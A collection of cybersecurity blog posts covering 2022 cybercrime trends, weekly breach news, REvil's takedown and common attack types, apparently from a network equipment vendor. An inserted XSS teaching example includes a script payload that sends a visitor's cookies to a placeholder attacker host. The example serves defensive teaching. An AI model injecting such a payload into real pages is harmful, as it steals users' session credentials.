Thursday, January 27, 2022

Cybercrime in 2022: what can we expect?


Trends indicate that cybercrime in 2022 will continue to increase and further entrench itself as a part of life both domestically and with regard to international business and political relationships.

2021 was a year of escalation in both the severity and frequency of cyberattacks. As criminals continually pried into security cracks present either due to poor security protocols or the chaos inherent to a world changing to cope with a global pandemic, news related to everything from phishing scams to ransomware attacks on healthcare facilities and state-sponsored snooping regularly made the headlines.

Why will cybercrime in 2022 increase?

A perfect storm of three major factors has been brewing over the last two years, and it has provided an ideal environment for bad actors to work in.

First, the sudden, sharp rise in crime is largely attributable to the onset of the COVID-19 pandemic. The migration of in-house teams to remote workforces has had a disastrous effect on cybersecurity, because managing protocols is extremely challenging when every employee's home network and endpoint security configuration has to be taken into account. Short-staffed IT teams, spread thin by people being out sick or leaving for new work, exacerbated the issue.

Second, the worldwide connectivity that promised so much at the advent of the internet has proven to be a double-edged sword. With everything from critical medical devices to kitchen appliances incorporating internet connectivity, criminals have gained entirely new ways to reach user information or cripple devices and demand payment from their victims.

Third, criminal enterprises have become very much aware that a great many organizations and companies have allowed security protocols to lapse, if they ever had them in place at all. Weak passwords, poorly maintained VPNs and more have made data-rich medical practices, tech companies, transportation agencies and even the FBI susceptible to hacking.

The world of cybersecurity as a whole seems to have been caught off guard. Faced with new, serious demands from the sudden influx of predatory malware and data thieves, unprepared companies have seen their data breached both through direct attacks and through attacks on third-party vendors who have access to private information.

Cybercrime in 2022 so far

As 2022 barely gets off the ground, it’s evident that last year’s cybercrime spree shows little sign of slowing down. 

Last year’s biggest exploit persists

As of the writing of this article on January 24th, the vulnerability in the Apache Log4j Java logging library discovered in the final weeks of 2021 continues to wreak havoc within networks that have yet to update their software, or that were too slow to do so before attackers took advantage of the exploit. To make matters worse, a similar vulnerability has since been reported in another widely used Java component that can give a bad actor a comparable degree of control over a victimized system.

Experts expect that these vulnerabilities, which quickly dropped out of the news cycle in spite of their severity, will pose continual challenges throughout the year.

Healthcare and humanitarian hacks continue

The International Committee of the Red Cross found itself the victim of an attack on a third-party company that the organization employed to store data, exposing the private data of more than half a million people that the organization was tasked with safeguarding during periods of international conflict. Considering the nature of the data stolen, it is reasonable to assume that the Red Cross may find itself pressured to negotiate with the thieves.

Attacks on smaller but no less critical healthcare organizations also continue, as hospitals grapple with trouble related to the coronavirus and find their staff perpetually spread thin and overworked in environments that depend heavily on web-connected devices and computers.

COVID-19 cybercrime resurges

Scams related to the COVID-19 pandemic continue to persist, as the Omicron variant of the virus has wreaked havoc on hospital facilities and staff alike. Instances of phishing scams related to vaccination and testing have increased by more than 500% as hackers look to capitalize on the anxiety and confusion with regard to the virus’s spread. 

We can expect cybercrime in 2022 to continue to take advantage of virus-related fears, especially if further variants appear that keep tensions high.

Crypto hacks expected to escalate

The wild west world of cryptocurrency continues to create a landscape favorable to hackers, thanks to its prioritization of anonymity and the lack of federal oversight and regulation. Crypto.com, one of the largest cryptocurrency exchanges in the world, lost $30 million after hackers were able to bypass its two-factor authentication and transfer funds out of users' wallets.

The breach and theft, initially downplayed by the company, illustrates that even the largest players in crypto can be pickpocketed by hackers as 2021's many crypto-related hacks continue to echo into the new year. Cybercrime in 2022 will likely further highlight the dangers inherent in participating in the volatile crypto market.

International cyber warfare fully realized

Along with 2021's ransomware thieves and scammers, state-sponsored cyberattacks moved front and center. With large-scale incidents affecting the software supply chain, the Colonial Pipeline and even the internet at large, the Biden administration and the US Congress have placed a greater focus on cybercrime. An international coalition was formed to help expedite the exchange of information related to hacks, and talks between President Biden and Russian President Vladimir Putin regarding his country's harboring of cybercrime gangs took place.

While Moscow authorities did their part to dismantle the notorious ransomware gang known as REvil, the maneuver comes during a time of increasing international tension as Russia is believed to have sponsored attacks against Ukraine’s government computer systems. 

Putin, who views Ukraine as a Russian territory as opposed to an independent state, will likely utilize cyberattacks to supplement the pressure put on Ukraine by the presence of troops along the country’s borders. 

Russia's activities in Ukraine illustrate the important role that cyberattacks can play when it comes to negotiation, leverage and aggression in today's landscape. Regardless of the outcome of Russia's actions, the playbook will surely continue to be used globally as countries with historic tension, like Israel and Iran, take skirmishes to the digital world and continue to delegitimize and hamper one another with everything from website defacement to transportation shutdowns.

As the year progresses, we can expect to see cybercrime in 2022 further weaponized through strategic cyber warfare. We can also expect an international bolstering of defenses against it as cyberspace finally fully realizes its prediction as the “battleground of the future.”

What can be done about cybercrime in 2022?

The biggest hacks simply cannot be prevented by individual users. We entrust organizations to protect our data or suffer the consequences. However, most of the multibillion-dollar corporations that make headline news due to security failures are able to weather a black eye and have little to answer for, as public outrage regarding security breaches rarely reaches the level it should unless a service is visibly disrupted.

As greater regulation is considered at all levels of the US government when it comes to cybersecurity accountability, it’s important to consider your own personal habits with regard to cybercrime in 2022. Most hacks are waged against small businesses, many of whom are never able to fully recover.

Here are some personal cybersecurity basics that can help keep you safe:

Password strength is paramount. Strong, randomized passwords will help fortify you against some of the most preventable hacks.

Use multi-factor authentication wherever possible. It is not foolproof, but hackers are opportunists: they are quick to take advantage of easily breached accounts long before they put in the work to crack those that are more adequately protected.

Update your hardware and software. Developers are continually issuing patches to help mitigate vulnerabilities that can be used to steal your data. Update your OS and all software regularly and quickly. Swap out outdated hardware with refurbished firewalls or network switches from a reputable dealer.

Train your staff and yourself. The vast majority of hacks take place because of some degree of user error. Whether it’s an employee clicking a link that leads to malware or a fraudulent email that is designed to look like it came from your boss, knowing how to spot the fakes is critical.

Sources:

2022 is shaping up to be an epic fight to protect data by Bree Fowler, 10 Jan 2022, CNET

COVID test related scam emails still highly popular among cybercriminals 24 Jan 2022, Help Net Security

International Red Cross hack exposes half a million vulnerable people 20 Jan 2022, BBC News

Crypto.com Says ‘Incident’ Was Actually $30 Million Hack by Lorenzo Franceschi-Bicchierai, 20 Jan 2022, Vice

Cybersecurity is Still The Top Tech Threat in Healthcare, According to ECRI by Eric Wickland, 24 Jan 2022, HealthLeaders

15 Important Cybersecurity Statistics in 2021 6 Feb 2021, TitanFall

Cybersecurity News week ending 23 Jan 2022 ~ NetworkTigers


Cybersecurity news provided by NetworkTigers on Monday, 24 January 2022.

SAN MATEO, CA — Open Subtitles hacked due to outdated security, Ohio health system attacked with ransomware, COVID scams increase by 500% due to Omicron, Apple Safari bug exposes user data, cyberattack affects Red Cross, Minnesota family clinic breached, Beijing Olympics app contains critical privacy flaw, New Mexico school attacked with ransomware, top stolen credit card marketplace shutting down, Crypto.com hacked, Ukraine claims Russia behind “hybrid” cyberattack war.

Open Subtitles hacked due to outdated security

Open Subtitles, a popular website used to download thousands of subtitle files for shows and movies in different languages, has been breached and held to ransom, exposing user data including IP addresses and passwords. Open Subtitles was launched in 2006 and reportedly has not had its security measures updated since. The site was hacked via a weak administrative password. Read more.

Ohio health system attacked with ransomware

Ohio-based Memorial Health System has reported that in August of 2021 it suffered a ransomware attack. At the time, the attack caused the rescheduling of procedures and other disruptions to services. Statements following the attack led readers to believe that the hospital system paid a ransom to regain its data. In December of last year it was determined that patient data may have been accessed or stolen, and Memorial Health System has offered affected individuals free credit monitoring services. Read more.

COVID scams increase by 500% due to Omicron

Phishing scams that are designed to capitalize on pandemic anxiety have skyrocketed 500% in the wake of worries over the latest Omicron variant of the COVID-19 virus, according to a report from Barracuda Networks. Malicious actors often try to capitalize on current events, and the pandemic has provided ample opportunities for people to craft scams based on vaccinations, testing and regulation rollouts as the pandemic continues into its third year. Read more.

Apple Safari bug exposes user data

A flaw present in Safari 15 allows for the use of malicious code to track a victim’s internet activity and possibly reveal their identity according to researchers at FingerprintJS. Apple has marked the flaw as “resolved,” although they have yet to release an update to close the vulnerability. Falling victim to this exploit requires nothing more than visiting a malicious website that has been designed to take advantage of it. Read more.

Cyberattack affects Red Cross

An attack against a subcontractor used by the International Committee of the Red Cross has reportedly compromised the data of more than 500,000 “highly vulnerable” people. While the data accessed has yet to be leaked, the Red Cross has had to temporarily shut down IT infrastructure that is used to help reunite families separated by incidents such as conflict or natural disaster. It is not currently known what company the attack was launched against nor who may be responsible. Read more.

Minnesota family clinic breached

Entira Family Clinics, based in St. Paul, Minnesota, has reported that a breach had taken place involving a third party that it employs for cloud services. Nearly 200,000 patients are affected by the breach, although Entira has stated that no improper use of any data has thus far been detected. Affected individuals have been offered complimentary credit monitoring services. Read more.

Beijing Olympics app contains critical privacy flaw

The MY2022 app that attendees of the upcoming Beijing Winter Olympics need to manage documents and communication has been found to have a serious flaw that allows a third party to work around the encryption it uses. Information that users are required to upload to the app includes passport information, travel history and health data. The app’s flaws are drawing considerable concern given that Olympic events are prime targets for cyberattacks. Read more.

New Mexico school attacked with ransomware

The Albuquerque Schools student information system was attacked with ransomware, according to a statement from the Superintendent. The FBI and law enforcement are reportedly investigating the attack, which is said to not have exposed any sensitive personal information. The Superintendent’s statement did not make clear if the attack was initiated from outside the country or from within US borders. Read more.

Top stolen credit card marketplace shutting down

UniCC, a leading marketplace for the buying and selling of stolen credit card data, has announced that it is shutting down operations. While the administrators of the site imply that they are simply unable or unwilling to keep up with the demands of running an illicit black market, researchers suspect that pressure from authorities may be causing them to quit. Others suspect that the site's administrators are using the volatility of the underground market as cover for an exit scam, cutting their losses while making off with any balances that users do not spend before the marketplace goes offline. Read more.

Crypto.com hacked

Popular crypto exchange Crypto.com has been hacked, with numerous reports of accounts having funds withdrawn by unauthorized users. In response, the company restricted withdrawals on the platform. The hackers are suspected to have accessed user data after getting through two factor authentication, and Crypto.com is urging all users to reset their login credentials. Read more. 

Ukraine claims Russia behind “hybrid” cyberattack war

Ukraine, after suffering a widespread cyberattack that defaced numerous government websites, is claiming that there is sufficient evidence to place blame for the incident on Russia’s efforts at initiating a “hybrid” war with the country. Tensions with Russia have been heightened as Moscow is demanding that Ukraine, a former Soviet state, not be permitted to join NATO. Read more.


About NetworkTigers

NetworkTigers was founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms. Today, NetworkTigers provides consulting and network equipment to businesses, health care and government agencies globally. www.networktigers.com

Cybersecurity News

NetworkTigers provides the latest industry and cybersecurity news in a weekly roundup at news.networktigers.com.

10 cybersecurity breaches that you should worry about


Protecting business data is a growing challenge because cyber threats are getting more intense and sophisticated amid the rising levels of dependence on digital devices and remote work. Unfortunately, cyberattacks involving phishing and malware have placed the assets and sensitive data of individuals, organizations, and governments at risk.

Before we discuss the top 10 cybersecurity breaches that you should worry about, we’ll tell you what a cybersecurity breach is and how to detect cybersecurity threats.

What is a cybersecurity breach?

A cybersecurity breach refers to any malicious attack that damages information, disrupts digital operations, or accesses data unlawfully. Cyber threats originate from different actors, including disgruntled employees, terrorist groups, criminal organizations, corporate spies, and hostile-nation states.

High-profile cyberattacks can result in private information being exposed, especially when businesses fail to implement and test security strategies such as firewalls and encryption. Cybercriminals use an organization’s or individual’s sensitive information to access their financial accounts or steal data. 

How to detect cybersecurity threats

Nearly every day, many security incidents go unnoticed because companies do not know how to identify them. Here are ways organizations can easily detect security breaches. 

  • Unauthorized employees trying to access data and servers – Some employees probe to find out what information and systems they can reach. Warning signs include logins from several different or unusual locations within a short time frame, logins at abnormal hours, and users requesting access to information unrelated to their tasks.
  • Changes in outbound network traffic – Organizations should worry not only about the traffic coming into a network but also about the traffic leaving it. Examples include employees sending many emails with attachments outside the organization, copying large volumes of documents to external storage devices, and uploading large files to personal cloud applications.
  • Changes in configuration – Unapproved changes such as modified firewall rules, new startup programs, added scheduled tasks, and reconfigured services are signs of malicious activity.
  • Traffic sent to or from unknown locations – For a business that operates in a single country, traffic to or from other countries may indicate malicious activity. Administrators should check the legitimacy of any traffic to unfamiliar networks.
  • Hidden or unexpected files – Files with unusual locations, sizes, or names are suspicious and may indicate that logs or data have been tampered with or that an attacker is staging tools or stolen data.
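The first warning sign above, logins from several locations in a short window or at odd hours, is easy to turn into detection logic once logins are logged in a parseable form. The script below is an added example, not code from the original article: it runs three simple rules over a constructed login log. The log format (timestamp, user, source country, result), the business-hours range and the thresholds are assumptions for the sake of the example.

```python
"""Added example (not from the original article): run three simple
detection rules over a constructed authentication log.  The log
format, the business-hours range and the thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, one login event per line (assumed format):
# ISO-8601 timestamp, username, source country, result
SAMPLE_LOG = """\
2022-01-24T09:02:11Z alice US success
2022-01-24T09:40:03Z alice DE success
2022-01-24T13:15:42Z bob US success
2022-01-24T02:47:09Z carol US success
2022-01-24T17:20:00Z dave US failure
2022-01-24T17:20:30Z dave US failure
2022-01-24T17:21:00Z dave US failure
2022-01-24T17:21:30Z dave US failure
2022-01-24T17:22:00Z dave US success
"""

BUSINESS_HOURS = range(7, 20)          # 07:00-19:59 UTC, assumed
TRAVEL_WINDOW = timedelta(hours=2)     # two countries inside this window is suspicious
FAIL_THRESHOLD = 3                     # failures before a success that we flag
FAIL_WINDOW = timedelta(minutes=5)

def parse_log(text):
    """Return events sorted by time as (timestamp, user, country, result)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, country, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, country, result))
    return sorted(events)

def find_multi_location_logins(events, window=TRAVEL_WINDOW):
    """Users with successful logins from two countries within `window`."""
    alerts = set()
    history = defaultdict(list)
    for ts, user, country, result in events:
        if result != "success":
            continue
        for prev_ts, prev_country in history[user]:
            if prev_country != country and ts - prev_ts <= window:
                alerts.add(user)
        history[user].append((ts, country))
    return sorted(alerts)

def find_off_hours_logins(events, hours=BUSINESS_HOURS):
    """Users with a successful login outside business hours."""
    return sorted({user for ts, user, _, result in events
                   if result == "success" and ts.hour not in hours})

def find_failure_bursts(events, threshold=FAIL_THRESHOLD, window=FAIL_WINDOW):
    """Users whose success follows `threshold` or more failures within `window`
    (password guessing that eventually worked)."""
    alerts = set()
    failures = defaultdict(list)
    for ts, user, _, result in events:
        if result == "failure":
            failures[user].append(ts)
            continue
        recent = [t for t in failures[user] if ts - t <= window]
        if len(recent) >= threshold:
            alerts.add(user)
        failures[user] = []
    return sorted(alerts)

def scan(text=SAMPLE_LOG):
    """Run every rule and return {rule_name: [users]}."""
    events = parse_log(text)
    return {
        "multi_location": find_multi_location_logins(events),
        "off_hours": find_off_hours_logins(events),
        "failure_bursts": find_failure_bursts(events),
    }

if __name__ == "__main__":
    for rule, users in scan().items():
        print(f"{rule}: {users}")
```

On the sample log this flags alice (US then DE within 40 minutes), carol (login at 02:47) and dave (four failures followed by a success). Real deployments would replace the country field with a GeoIP lookup on the source address and feed the alerts to a SIEM, but the rules themselves do not change.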

10 common cybersecurity breaches

Cybersecurity incidents can cause intrusions on a company’s network and cost businesses a lot of money to rectify the cybercrime damage. Let’s take a look at top cybersecurity threats and how to deal with them.

  1. Man-in-the-middle (MitM) attack

In this attack, a criminal secretly intercepts and alters messages between two parties that believe they are speaking with each other directly. The attacker relays traffic between the two so that both sides see a normal conversation while the attacker reads or modifies it. Examples include Wi-Fi eavesdropping, email hijacking, and session hijacking.

Organizations should use encryption protocols such as Transport Layer Security (TLS), with certificate validation enabled, to provide authentication, confidentiality, and integrity between two communicating applications. Companies should also use VPNs to secure connections over untrusted networks and educate workers on the dangers of public Wi-Fi, which an attacker can easily monitor or impersonate.

  2. Web application attack

This attack involves defeating authentication mechanisms and exploiting code-level vulnerabilities in web applications. One example is cross-site scripting (XSS), in which an attacker injects a malicious script into a page served by a trusted website so that it runs in other users' browsers.

Companies should check code early in the development cycle using static and dynamic analysis tools to identify vulnerabilities, and should escape or encode untrusted input for the context in which it is rendered. Web application firewalls can monitor HTTP traffic and block known attack patterns, and bot detection should be in place to keep automated tools from harvesting the application's data.
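The cross-site scripting example above comes down to one decision: whether untrusted input is written into the page verbatim or encoded for the context it lands in. The block below is an added example, not code from the original article. It renders the same fragment both ways and shows why attribute context needs an allow-list on top of escaping. The function names and the sample payload are assumptions.

```python
"""Added example (not from the original article): the vulnerable and the
hardened way to reflect user input into HTML.  Function names and the
sample payload are assumptions."""
from html import escape

# Constructed payload of the kind a reflected-XSS probe would send.
PAYLOAD = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'

def render_search_vulnerable(term: str) -> str:
    # Writes the query parameter into the page verbatim: classic reflected XSS.
    return f"<p>Search results for: {term}</p>"

def render_search_safe(term: str) -> str:
    # escape() rewrites &, <, >, " and ' so the browser treats the value as text.
    return f"<p>Search results for: {escape(term, quote=True)}</p>"

def render_link_safe(label: str, target: str) -> str:
    """Attribute context: escape the value AND allow-list the URL scheme.
    Escaping alone leaves a javascript: URL perfectly executable."""
    if not (target.startswith("https://") or target.startswith("/")):
        target = "/"
    return f'<a href="{escape(target, quote=True)}">{escape(label, quote=True)}</a>'

def contains_active_content(fragment: str) -> bool:
    """Crude check used only to demonstrate the difference between the two renderers."""
    low = fragment.lower()
    return "<script" in low or "javascript:" in low or "onerror=" in low

if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_safe(PAYLOAD))
    print(render_link_safe("home", "javascript:alert(1)"))
```

In a real application the escaping is done by the templating engine (auto-escaping on), and the allow-list on URLs is the part engines do not do for you.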

  3. Privilege escalation attacks

Attackers who gain a foothold on a company's network may try to obtain higher-level privileges by exploiting a privilege escalation flaw. A successful escalation gives the attacker rights that ordinary users do not have, such as administrator or root access.

These attacks exploit vulnerabilities or misconfigurations in systems and applications, programming errors, or a bug to gain access to protected information. To lower the risk, companies should identify and patch security weak spots, implement security monitoring, and limit each user's access rights to what the job requires.

  4. Malware attack

Malware covers malicious software of all kinds, including viruses, spyware, ransomware, and Trojans. Some malware is installed when workers install freeware, visit infected websites, or click on a malicious ad.

Signs of malware include an increase in pop-up ads or unwanted internet activity, unusually low speeds, sudden loss of disk space, and repeated freezes or crashes. Antivirus software can detect and remove malware through routine system scans and real-time protection.

  5. Insider threat

This is an accidental or malicious threat to a company's information or security attributed to former or current employees and third parties, including customers and contractors. Businesses should put in place a rigorous archiving and data backup routine and implement antivirus and spyware scanning programs.

It is also crucial to train contractors and employees on security awareness before granting them access to the company network. Monitoring of employee activity, within the limits of applicable law, also helps minimize theft of intellectual property and data breaches by identifying malicious, careless, or disgruntled insiders.

  6. Advanced persistent threat (APT)

An APT is a targeted and prolonged attack executed by nation-states or well-resourced criminal groups. The attackers gain access to a network and remain undetected for a long period. Their goal is usually to observe the network's activity and steal information rather than to disrupt the network or the company.

Monitoring traffic (outgoing and incoming) can help businesses detect backdoors and access to private data. Network firewalls such as the Cisco ASA and next-generation firewalls can filter network-level attacks, while a web application firewall can filter out application-layer attacks like SQL injection, which are often used during the initial infiltration phase.

  7. Password attack

This attack aims to obtain an account's login credentials by guessing passwords through trial and error or by using password sniffers and password cracking programs. Businesses should adopt multi-factor authentication for validating users and should store passwords only as salted, slow hashes rather than in plaintext or in reversible encrypted form.

Additionally, users should use strong, unique passwords for each account, preferably generated by a password manager, and change a password promptly whenever a compromise is suspected.

  8. Unauthorized attempt to access information or servers

Organizations should implement two-factor authentication so that a stolen password alone does not let an attacker use an authorized user's account to reach data or servers. Organizations should also encrypt sensitive data, both as it travels across networks and at rest, using well-reviewed hardware or software solutions so that an attacker who obtains the raw storage or captures the traffic cannot read confidential information.

  9. Phishing attack

In phishing attacks, attackers masquerade as reputable people or entities in communication channels such as email. They distribute malicious attachments or links to obtain account information or login credentials from victims. Companies should deploy email gateway filtering to reduce the number of phishing emails that reach users' inboxes, and train users to report the ones that get through.

  10. Denial-of-service (DoS) attacks

DoS attacks take down an entire network or an individual system so that it can no longer respond to legitimate service requests, either by sending crafted input that crashes the target or by flooding it with more traffic than it can handle. Rebooting alone does not help while the flood continues; businesses should configure servers, routers, and firewalls to drop bogus traffic and apply rate limiting, and for large volumetric attacks rely on upstream filtering from their ISP or a DDoS mitigation service.


Russia’s takedown of REvil explained


It was recently revealed that Russian authorities had dismantled notorious ransomware as a service (RaaS) group REvil via a series of raids and arrests.

What is REvil?

REvil, also referred to as Sodinokibi, is a Russia-based ransomware gang that has plagued industry and government organizations alike with its history of brazen, high profile attacks.

In 2020, REvil engaged in attacks on victims ranging from then US president Donald Trump to celebrities including Lady Gaga and Madonna. The information stolen from Donald Trump was allegedly sold, whereas Lady Gaga suffered a leak of harmless emails and the attack on Madonna seemed to evaporate.

In 2021, REvil took its actions into high gear and rose to prominence with headline-grabbing attacks against prominent industry leaders. 

In May, Brazilian company JBS, the world’s largest supplier of meat and poultry products, was forced into a temporary shutdown as a result of REvil’s ransomware attack. Grabbing the attention of the White House, the FBI confirmed REvil’s involvement in the hack. JBS reportedly paid an $11 million ransom in Bitcoin to REvil in exchange for regaining control of their network and resuming operations.

In July of 2021, REvil set their sights on Florida-based software company Kaseya. As a result of their attack on Kaseya, over 1,000 of the company’s downstream clients felt the effects of REvil’s malware, resulting in an international ransomware crisis that affected organizations ranging from schools to rail operators to grocery stores. Kaseya was able to restore their systems with the help of a third party’s decryption key and reportedly did not pay a ransom.

Escalating attacks

As REvil's actions, along with cyberattacks of all types, created international havoc for organizations throughout 2021, the Biden administration sought to take Moscow to task for harboring cybercriminals, regardless of whether they were independent or state-sponsored.

After a July 9th phone call between the leaders, President Biden said, "I made it very clear to him that the United States expects, when a ransomware operation is coming from their soil even though it's not sponsored by the state, that we expect them to act if we give them enough information to act on who that is."

REvil goes dark

Shortly after Biden and Putin's conversation, it was noted that REvil's online footprint, including websites and other digital infrastructure, had seemingly disappeared. This led to speculation that pressure from government authorities had forced the group into hiding.

Research into REvil’s software also revealed that the gang had built in code that allowed it to cheat clients out of ransom money paid by victims. This revelation greatly soured the hacker community’s trust in REvil as a reliable RaaS provider.

In October 2021 an international team forced REvil offline after hacking the gang's servers, and in November two REvil affiliates were arrested in Romania.

REvil dismantled

On January 14, 2022, reports from Moscow indicated that Russia's Federal Security Service (FSB) and the Ministry of Internal Affairs had effectively taken REvil down. Raids were conducted at 25 properties linked to 14 REvil members across various parts of Russia, and at least eight people were arrested.

The FSB's official statement reported the seizure of computer equipment, cryptocurrency, more than 426 million rubles, US$600,000 and €500,000. The raids also resulted in the confiscation of 20 luxury vehicles that REvil members had purchased with funds from their ransomware operations.

According to a statement from the FSB, “the organized criminal community ceased to exist” and “the information infrastructure used for criminal purposes was neutralized” as a result of their actions.

Political motivations

Russia has been quick to assert that their deconstruction of REvil was done as an act of goodwill at the request of President Biden and other G7 nations.

However, many believe that the country’s moves against the gang were done in part to help take eyes off of Moscow during a period of escalating international tension with regard to Russia’s pressure on neighboring Ukraine. The raids took place shortly after a widespread cyberattack defaced 70 government websites belonging to the former Soviet state.

Ukrainian authorities feel that they have adequate evidence to place blame for the attack on Russia, referring to Moscow's maneuvering as a "hybrid" war in which cyberattacks complement the increased physical presence of Russian troops at the countries' shared border. Russia's motivation is to keep Ukraine, which gained independence from the Soviet Union in 1991, from coming under further Western influence in the form of NATO membership.

Many experts believe that Russia’s actions regarding REvil have been timed in order to use the gang’s dissolution, and Russia’s continued cooperation with regard to cybercriminals, as leverage in the face of sanction threats and looming, high stakes diplomacy.

Does REvil even matter anymore?

While REvil’s takedown has important implications when it comes to the ability of government authorities to crack down on hackers, the loose structure of ransomware gangs and the continually evolving hierarchy of big players in the world of cybercrime leads some to wonder if the supposed end of REvil even matters.

Ransomware gangs have a habit of going quiet only to rebrand or reappear under a different name using similar, if not identical, malware and tactics. REvil itself is believed to be either an offshoot or a newer incarnation of a previously active gang known as GandCrab. 

BlackMatter, a relatively new RaaS provider, emerged soon after DarkSide went dark in the wake of its attack on the Colonial Pipeline. BlackMatter says that it combines the best features of now-crippled ransomware gangs, REvil included. Authorities and experts agree that the actors involved in these groups have nebulous loyalties, with members moving between groups, comparing notes, and repeatedly reinventing their names and associations.

What this means is that while a ransomware gang being rendered inactive may be perceived as a win for those who want bad actors to take a second thought with regard to their supposed immunity from consequences, the hydra-like nature of criminal enterprise means that vacuums rarely go unfilled for long.

This month’s decapitation of REvil may simply result in the growth of a new head and yet another player on the field in today’s war against ransomware purveyors.


Cybersecurity News week ending 16 Jan 2022 ~ Network Tigers


Cybersecurity news provided by NetworkTigers on Monday, 17 January 2022.

SAN MATEO, CA — CISA and FBI issue joint cybersecurity advisory pertaining to Russian cyber threats, Ukraine under suspected Russian cyberattack, Russian security reportedly dissolves REvil ransomware group, Pegasus spyware found on Salvadoran journalists' phones, hacker able to remotely control features on Tesla automobiles, Microsoft issues massive Windows patch to address 97 security flaws, New Mexico cyberattack affects prison, Rhode Island Transit Authority breached due to file stored on employee hard drive, California city suffers data breach, fertility clinic suffers cyberattack, QNAP urges users to take NAS devices offline.

CISA and FBI issue joint cybersecurity advisory pertaining to Russian cyber threats

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued a joint cybersecurity advisory that provides an overview of Russian state-sponsored cyberthreats as they pertain to critical US infrastructure and operations. The advisory goes into detail with regard to the tactics observed by cybercriminals and best practices for both prevention and mitigation of attacks. Read more.

Ukraine under suspected Russian cyberattack

Ukraine, amidst growing tensions with Russia, which is demanding that the country not join NATO, has been hit with a cyberattack that has taken down over a dozen government websites. While Ukrainian authorities have not officially cast blame for the attack, the current political climate and the fact that the hacks do not seem to be financially motivated lead most to believe that the attack was, to some degree, directed by Russia. Read more.

Russian security reportedly dissolves REvil ransomware group

Under a formal request from US authorities, Russia’s Federal Security Service (FSB) has reportedly taken down the infamous ransomware gang known as REvil. According to local information, the FSB raided 25 locations and seized assets in the form of cash, cryptocurrency and luxury vehicles. 14 individuals have been charged with crimes and the gang’s infrastructure has reportedly been “neutralized.” Read more.

Pegasus spyware found on Salvadoran journalists’ phones

Independent Salvadoran news site El Faro was found to be targeted with Pegasus spyware, with the NSO-created product found on 22 journalists’ phones. El Faro has largely been at odds with the Salvadoran government and suspects that many of the plans they had made for investigative work were foiled due to having been hacked. Read more.

Hacker able to remotely control features on Tesla automobiles

A German teenager claims that he has been able to remotely control features on 25 Tesla automobiles using a flaw he discovered in a piece of third-party software. He reports that he is able to lock and unlock doors, turn headlights on and off and control the car’s sound system, among other features. He has reportedly been in contact with both Tesla and the third-party software company with regard to his findings. Read more.

Microsoft issues massive Windows patch to address 97 security flaws

Microsoft is intent to start the new year with an effort to put at least some of 2021’s security flaws to rest. The company has issued a patch that addresses and closes 97 vulnerabilities. Some of the fixes are meant to address Log4j vulnerabilities that continue to plague systems as hackers find new ways to leverage the exploit. Windows users are urged to update immediately. Read more.

New Mexico cyberattack affects prison

A January 5th cyberattack on the government systems of Bernalillo County, New Mexico resulted in the county’s Metropolitan Detention Center losing access to its camera feeds, automatic locks and database. The attack has forced jail officials to keep prisoners locked in their cells until services return, resulting in the jail filing an emergency notice with regard to laws that require prisoners to be provided with liberties that involve time out of their cells. Read more.

Rhode Island Transit Authority breached due to file stored on employee hard drive

In August of 2020, the personal data of more than 17,000 state workers associated with the Rhode Island Transit Authority (RIPTA) was exposed to cybercriminals after it was reportedly downloaded to an employee’s hard drive which was then hacked. It is not currently clear how or why the employee downloaded the information, with RIPTA claiming that the data was improperly shared by a third party health insurance provider. Read more.

California city suffers data breach

Grass Valley, California, has reported that the city suffered a data breach that has exposed the data of all city vendors and employees as well as anyone who has provided information to the town’s police department. Information such as Social Security numbers, credit card information, addresses and more has been exposed. The breach is stated to have begun on April 13, 2021 and lasted up until July 1, 2021. Read more.

Fertility clinic suffers cyberattack

Fertility Centers of Illinois suffered a December 27th cyberattack, exposing the sensitive personal and medical information of more than 80,000 patients. The data exposed includes Social Security numbers, names, birth dates, account passwords, PIN numbers and a multitude of other high value information. Reportedly, the attackers used a compromised administrative account to carry out the breach. Read more. 

QNAP urges users to take NAS devices offline

Taiwanese manufacturer QNAP is urging users of its network-attached storage (NAS) hardware to disconnect their devices in response to a wave of ransomware and brute-force attacks. QNAP is instructing users to run their device’s Security Counselor program to determine which router ports are at risk. Read more.


About NetworkTigers

NetworkTigers was founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms. Today, NetworkTigers provides consulting and network equipment to businesses, health care and government agencies globally. www.networktigers.com

Cybersecurity News

NetworkTigers provides the latest industry and cybersecurity news in a weekly roundup at news.networktigers.com.

Common network security monitoring tools


Network security monitoring tools help protect digital assets, including network traffic, while also preventing and responding to unauthorized network intrusion. The progressive nature of these threats requires dynamic multi-point security solutions to protect data security.

In this post, we’ll share with you the best network security tools to combat network attacks. These tools make for a strong starting point for companies that want to secure their networks. 

The three important focuses of network security

There are three key focuses within network security that serve as a foundation of a company’s network security strategy:

  • Response
  • Detection
  • Protection

Response involves reacting to identified network security attacks and resolving them quickly. Detection refers to the assets that enable you to examine network traffic and identify issues quickly before they can cause any harm. Lastly, protection entails any policies or tools that prevent network security intrusion. 

Unfortunately, many companies do not know how to follow these policies, or do not follow them properly. This is worrying because when malicious threats come through after a network breach, there is more at risk than the data itself.

Benefits of network security monitoring software

Cyber security tools help your company protect its sensitive data, reputation, and also its ability to remain in business. Organizations that become victims of cyberattacks find themselves crippled, unable to address customer needs or deliver services effectively. Below are some major benefits of security tools.

  • Prevents cyberattacks – Network security tools help prevent attacks on a network. If your network security is weak, hackers can plant malware and other threats and compromise a great deal of network data over the internet.
  • Centrally controlled – Unlike desktop security software, network security tools are managed centrally by a single administrator. While the former is vulnerable to threats, the latter blocks hackers before they can do any harm to the network, since the software is controlled by one person and designed to run on a system isolated from the internet.
  • Data protection – A network includes sensitive information like customers’ personal data. Such critical information can be compromised by people hacking into your network. Security tools help prevent unauthorized access to the network.

9 cyber security monitoring tools you need

Your network faces threats from attackers that are targeting certain companies for specific reasons. Here are the 9 cyber security software tools that can help you address the different methods these attackers employ:

  1. Endpoint security

The corporate world is increasingly embracing the bring your own device (BYOD) trend. Unfortunately, personal devices sometimes become targets when owners use them to access company networks. Endpoint security adds a defense layer between business networks and remote devices.

  2. Access control

